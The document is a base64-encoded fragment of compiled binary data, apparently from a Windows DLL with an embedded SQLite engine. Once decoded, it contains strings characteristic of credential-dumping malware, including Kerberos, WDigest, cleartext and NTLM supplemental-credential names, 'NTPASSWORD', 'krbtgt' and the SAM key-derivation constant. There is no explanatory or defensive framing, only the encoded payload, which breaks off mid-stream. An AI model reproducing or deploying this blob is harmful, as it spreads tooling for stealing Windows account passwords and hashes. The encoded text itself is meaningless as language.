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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgIDBQMEBQQAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2dUF+SChY9cAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6W1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAACAAMABQAGAAcACAAJAAECBQoPFBkZGTIyZB4EAAAwMTIzNDU2Nzg5QUJDREVGAAcEBgQoCgUgDgUwEwQ4FwUBHAUDAAAA4gADAF8AigCKAKYADAEzADQAKgBnAmcCcwL3AGsCawIxADEAMgAyADIAMgCXAjAAMAAwADAALwAvAC4ALgAuAC0A9QC1ArUC4gAuAC4ALgAtAPUAuwAzADQAKgBnAmcCcwIoAWsCawIxADEAMgAyADIAMgAtATAAMAAwADAALwAvAC4ALgAuAC0A9QAvAC8ALgAuAC4ALQD1ADkCtgJPAF8A4gCcA7UCtQIDAjoCFwAzADQAKgBnAmcCcwL1AGsCawIxADEAMgAyADIAMgBKAjAAMAAwADAALwAvAC4ALgAuAC0A9QCOADgCCwEiAR8BHgEsACkA4gAYAhkCyAD5ANUAHQEzADQAKgBnAmcCcwI7AGsCawIxADEAMgAyADIAMgAYADAAMAAwADAALwAvAC4ALgAuAC0A9QDiAA0CsQLsASwAKQADATMANAAqAGcCZwJzAuQBawJrAjEAMQAyADIAMgAyAIECMAAwADAAMAAvAC8ALgAuAC4ALQD1AOIAoQAEAeUBsALzAbQAMwA0ACoAZwJnAnMCCAJrAmsCMQAxADIAMgAyADIAcgMwADAAMAAwAC8ALwAuAC4ALgAtAPUA4gA7AKoDcQCWAgEAAAEzADQAKgBnAmcCcwKwAGsCawIxADEAMgAyADIAMgDnATAAMAAwADAALwAvAC4ALgAuAC0A9QDiAGgCaAJ0AiMBpwKoAjMANAAqAGcCZwJzAjkCawJrAjEAMQAyADIAMgAyADoCMAAwADAAMAAvAC8ALgAuAC4ALQD1AOIACwKxAlIC7gCnAqgCMwA0ACoAZwJnAnMCkwBrAmsCMQAxADIAMgAyADIALQEwADAAMAAwAC8ALwAuAC4ALgAtAPUANwIcAswBzQHOAeYBuwDiALYCSwCfAGwCLAApADMANAAqAGcCZwJzAh8AawJrAjEAMQAyADIAMgAyACwBMAAwADAAMAAvAC8ALgAuAC4ALQD1AOIAKQENARUBLAApAFECMwAoACoAZwJnAnMCIgBrAmsCMQAxADIAMgAyADIA5AAwADAAMAAwAC8ALwAuAC4ALgAtAPUA4gC0APQAkgCRAJAABwEqAjQAKgBnAmcCcwJ/AGsCawIxADEAMgAyADIAMgCmAjAAMAAwADAALwAvAC4ALgAuAC0A9QDiAO8A5QDMALQAkgPeAeMAogAqAGcCZwJzAk0CawJrAjEAMQAyADIAMgAyALQCMAAwADAAMAAvAC8ALgAuAC4ALQD1ACcAqQI1AKYC6gCtAq8A/ACxAO4BJwCjADUApgAMAR4AigA1AIAAEAGXAHsA1AAmAc8AJQGUACQAJQAdAvoAogKiAssAJgD2APYAJAAlALYCDgAqAiQAJQAmAPYA9gC1AqQAJgD2APYAMgAyADIAMgArADAAMAAwADAALwAvAC4ALgAuAC0A9QAwADAAMAAwAC8ALwAuAC4ALgAtAPUANgCjAqQCXgL+AC8BLgEtAPUAUwJ2ABQCsgJeAu8BLwEuAbUCXgJTAi8BLgEPAaAAUwJ9AHwAtQDcANsA2gCaANgA6AHoAdYBtwBYAlgCWAJaAgsAogKiAu0A7AC0AFgCWAJYAloCCwBYAlgCWAJaAgsALQG0ADIAMgAyADIA7wEwADAAMAAwAC8ALwAuAC4ALgAtAPUAOQCMArYCSwBRAl4CTwJZAl4CiQBZAlMCiQI6AFMCdACjAqQCjgAyAckBIgEfAR4BEAKuAC0BbgCiAqIClQIBAB0B4gETAswAKQERAV8AWAJYAlgCWAJYAlgCjQK2AksAHgKiAqICogKiAi0BogKiAhoBGwC4ArgCaQC5AI4C5gAOAi0BkwANAOkALQHxAC0BEgG2Ag8ALQEPAqMCpAKzACkBKgHiAfoBCAG2AksA5wCCALYCSwC2Ag8A2wEtAbYCDwAkAaMCpAKjAqQCvACjAqQCGAFvAPsBEwHrABQCsgKEA5cCtgIPANMAOwDhAOgALQEPAS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